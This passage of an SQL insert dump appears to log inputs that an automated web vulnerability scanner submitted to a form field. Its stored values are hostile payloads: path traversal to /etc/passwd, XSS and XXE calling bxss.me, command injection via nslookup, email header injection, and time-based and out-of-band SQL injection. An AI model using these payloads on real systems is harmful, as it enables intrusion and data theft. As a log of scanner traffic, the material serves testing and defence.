(367, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\', 0, '2017-10-27 14:25:52'),
(368, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF/web.xml', 0, '2017-10-27 14:25:52'),
(369, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF\\web.xml', 0, '2017-10-27 14:25:52'),
(370, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1\'&quot;()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;ZOG9(9108)&lt;/ScRiPt&gt;', 0, '2017-10-27 14:25:53'),
(371, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&quot;()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;ZOG9(9255)&lt;/ScRiPt&gt;', 0, '2017-10-27 14:25:53'),
(372, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '19248126', 0, '2017-10-27 14:25:54'),
(373, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'response.write(9662766*9986502)', 0, '2017-10-27 15:54:10'),
(374, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'+response.write(9662766*9986502)+\'', 0, '2017-10-27 15:54:10'),
(375, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&quot;+response.write(9662766*9986502)+&quot;', 0, '2017-10-27 15:54:11'),
(376, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;/script&gt;&lt;svg/onload=\'+/&quot;/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\\/s?u=002626&amp;r=34006-815&amp;h=34006-d9c16-2&amp;/).slice(2),document.documentElement.appendChild(s))//\'&gt;', 0, '2017-10-27 15:54:13'),
(377, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&gt;&quot;&gt;&lt;script src=http://bxss.me/s?u=002626&amp;r=34006-817&amp;h=34006-d9c16-1&gt;&lt;/script&gt;&lt;tcpdf method=&quot;addTTFFont&quot; params=&quot;%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,002626,34006-817,34006,d9c16,%22%5D&quot;/&gt;', 0, '2017-10-27 15:54:15'),
(378, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'bArnxDKV', 0, '2017-10-27 15:54:16'),
(379, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'set|set&amp;set', 0, '2017-10-27 15:54:22'),
(380, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '$(nslookup dns.ce.\\002626.34006-836.34006.d9c16.\\1.bxss.me)', 0, '2017-10-27 15:54:22'),
(381, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&amp;nslookup dns.ce.\\002626.34006-838.34006.d9c16.\\1.bxss.me&amp;\'\\&quot;`0&amp;nslookup dns.ce.\\002626.34006-838.34006.d9c16.\\1.bxss.me&amp;`\'', 0, '2017-10-27 15:54:23'),
(382, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'bcc:002626.34006-839.34006.d9c16.1@bxss.me', 0, '2017-10-27 15:54:23'),
(383, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'to@example.com&gt;\r\nbcc:002626.34006-840.34006.d9c16.1@bxss.me', 0, '2017-10-27 15:54:24'),
(384, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '${9999112+9999289}', 0, '2017-10-27 15:54:25'),
(385, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '', 0, '2017-10-27 15:54:32'),
(386, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg', 0, '2017-10-27 15:54:35'),
(387, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1some_inexistent_file_with_long_name\\0.jpg', 0, '2017-10-27 15:54:36'),
(388, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'Http://testasp.vulnweb.com/t/fit.txt', 0, '2017-10-27 15:54:37'),
(389, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://testasp.vulnweb.com/t/fit.txt?.jpg', 0, '2017-10-27 15:54:37'),
(390, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'testasp.vulnweb.com', 0, '2017-10-27 15:54:38'),
(391, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&amp;n980631=v910655', 0, '2017-10-27 15:54:38'),
(392, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '', 0, '2017-10-27 15:54:42'),
(393, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&quot;()', 0, '2017-10-27 15:54:43'),
(394, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', ')', 0, '2017-10-27 15:54:44'),
(395, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '!(()&amp;&amp;!|*|*|', 0, '2017-10-27 15:54:44'),
(396, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1', 0, '2017-10-27 15:54:45'),
(397, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '^(#$!@#$)(()))******', 0, '2017-10-27 15:54:45'),
(398, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1', 0, '2017-10-27 15:54:45'),
(399, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'TR9gbbjx', 0, '2017-10-27 15:54:46'),
(400, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1 OR 2+896-896-1=0+0+0+1 --', 0, '2017-10-27 15:54:46'),
(401, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1 OR 2+599-599-1=0+0+0+1', 0, '2017-10-27 15:54:47'),
(402, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', ';print(md5(acunetix_wvs_security_test));', 0, '2017-10-27 15:54:47'),
(403, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1\' OR 2+898-898-1=0+0+0+1 --', 0, '2017-10-27 15:54:47'),
(404, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\';print(md5(acunetix_wvs_security_test));$a=\'', 0, '2017-10-27 15:54:48'),
(405, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1\' OR 2+137-137-1=0+0+0+1 or \'dB4fQpxT\'=\'', 0, '2017-10-27 15:54:48'),
(406, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&quot;;print(md5(acunetix_wvs_security_test));$a=&quot;', 0, '2017-10-27 15:54:48'),
(407, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1&quot; OR 2+473-473-1=0+0+0+1 --', 0, '2017-10-27 15:54:48'),
(408, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '${@print(md5(acunetix_wvs_security_test))}', 0, '2017-10-27 15:54:49'),
(409, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'if(now()=sysdate(),sleep(9),0)/*\'XOR(if(now()=sysdate(),sleep(9),0))OR\'&quot;XOR(if(now()=sysdate(),sleep(9),0))OR&quot;*/', 0, '2017-10-27 15:54:49'),
(410, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '${@print(md5(acunetix_wvs_security_test))}\\', 0, '2017-10-27 15:54:49'),
(411, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '(select(0)from(select(sleep(9)))v)/*\'+(select(0)from(select(sleep(9)))v)+\'&quot;+(select(0)from(select(sleep(9)))v)+&quot;*/', 0, '2017-10-27 15:54:49'),
(412, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://testasp.vulnweb.com/t/xss.html?%00.jpg', 0, '2017-10-27 15:54:50'),
(413, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1; waitfor delay \'0:0:3\' --', 0, '2017-10-27 15:54:50'),
(414, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1); waitfor delay \'0:0:3\' --', 0, '2017-10-27 15:54:51'),
(415, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1 waitfor delay \'0:0:3\' --', 0, '2017-10-27 15:54:51'),
(416, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'C7I0zQEd\'; waitfor delay \'0:0:3\' --', 0, '2017-10-27 15:54:52'),
(417, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1;select pg_sleep(6); --', 0, '2017-10-27 15:54:52'),
(418, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1);select pg_sleep(6); --', 0, '2017-10-27 15:54:53'),
(419, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://hitXGO0dDSYSK.bxss.me/', 0, '2017-10-27 15:54:54'),
(420, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1));select pg_sleep(6); --', 0, '2017-10-27 15:54:54'),
(421, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'index.php', 0, '2017-10-27 15:54:54'),
(422, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'POiDhO7p\';select pg_sleep(6); --', 0, '2017-10-27 15:54:54'),
(423, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'index.php', 0, '2017-10-27 15:54:54'),
(424, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'ukNEV6zg\');select pg_sleep(9); --', 0, '2017-10-27 15:54:55'),
(425, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'index.php/.', 0, '2017-10-27 15:54:55'),
(426, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'pboH8vQF\'));select pg_sleep(9); --', 0, '2017-10-27 15:54:55'),
(427, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.002626.34006-863.34006.d9c16.1.bxss\'||\'.me\')', 0, '2017-10-27 15:54:57'),
(428, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.002626.34006-864.34006.d9c16.1.bxss\'||\'.me\')||\'', 0, '2017-10-27 15:54:57'),
(429, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\r\n&lt;!DOCTYPE acunetix [\r\n  &lt;!ENTITY acunetixent SYSTEM &quot;http://hitOUqknJ05He.bxss.me/&quot;&gt;\r\n]&gt;\r\n&lt;xxx&gt;&amp;acunetixent;&lt;/xxx&gt;', 0, '2017-10-27 15:54:59'),
(430, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1;copy (select \'\') to program \'nslookup dns.sqli.\\002626.34006-865.34006.d9c16.\\1.bxss.me\'', 0, '2017-10-27 15:54:59'),
(431, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1\';copy (select \'\') to program \'nslookup dns.sqli.\\002626.34006-866.34006.d9c16.\\1.bxss.me', 0, '2017-10-27 15:54:59'),
(432, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\r\n  &lt;!DOCTYPE roottag PUBLIC &quot;-//VSR//PENTEST//EN&quot; &quot;http://hitGFdEjxQEXM.bxss.me/&quot;&gt;\r\n&lt;roottag&gt;acunetix&lt;/roottag&gt;', 0, '2017-10-27 15:54:59'),
(433, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '128\'', 0, '2017-10-27 15:54:59'),
(434, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))', 0, '2017-10-27 15:55:00'),
(435, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;xi:include href=&quot;http://hitRpmLqLnpb5.bxss.me/&quot; parse=&quot;text&quot;/&gt;', 0, '2017-10-27 15:55:00'),
(436, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\r\n&lt;!DOCTYPE foo [\r\n&lt;!ELEMENT foo ANY &gt;\r\n&lt;!ENTITY % xxe SYSTEM &quot;http://hitkfdv9ASKSL.bxss.me/&quot;&gt;\r\n%xxe;\r\n]&gt;', 0, '2017-10-27 15:55:01'),
(437, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\r\n&lt;!DOCTYPE body SYSTEM &quot;http://hitmmirWo808T.bxss.me/&quot;&gt;\r\n&lt;body&gt;&lt;method&gt;test&lt;/method&gt;&lt;/body&gt;', 0, '2017-10-27 15:55:01'),
(438, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1\'&quot;', 0, '2017-10-27 15:55:02'),
(439, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/www.vulnweb.com', 0, '2017-10-27 15:55:03'),
(440, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\\', 0, '2017-10-27 15:55:03'),
(441, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../etc/passwd', 0, '2017-10-27 15:55:04'),
(442, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '@@PIv2l', 0, '2017-10-27 15:55:04'),
(443, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'JyI=', 0, '2017-10-27 15:55:04'),
(444, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&quot;', 0, '2017-10-27 15:55:04'),
(445, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../../../../../../proc/version', 0, '2017-10-27 15:55:04'),
(446, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;!--', 0, '2017-10-27 15:55:05'),
(447, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg', 0, '2017-10-27 15:55:05'),
(448, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../etc/passwd\\0.jpg', 0, '2017-10-27 15:55:05'),
(449, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg', 0, '2017-10-27 15:55:06'),
(450, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/../..//../..//../..//../..//../..//etc/passwd\\0.jpg', 0, '2017-10-27 15:55:06'),
(451, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd', 0, '2017-10-27 15:55:08'),
(452, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/etc/passwd', 0, '2017-10-27 15:55:08'),
(453, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '%2fetc%2fpasswd', 0, '2017-10-27 15:55:09'),
(454, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/.././.././.././.././.././.././.././../etc/./passwd%00', 0, '2017-10-27 15:55:09'),
(455, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd', 0, '2017-10-27 15:55:10'),
(456, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd', 0, '2017-10-27 15:55:10'),
(457, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././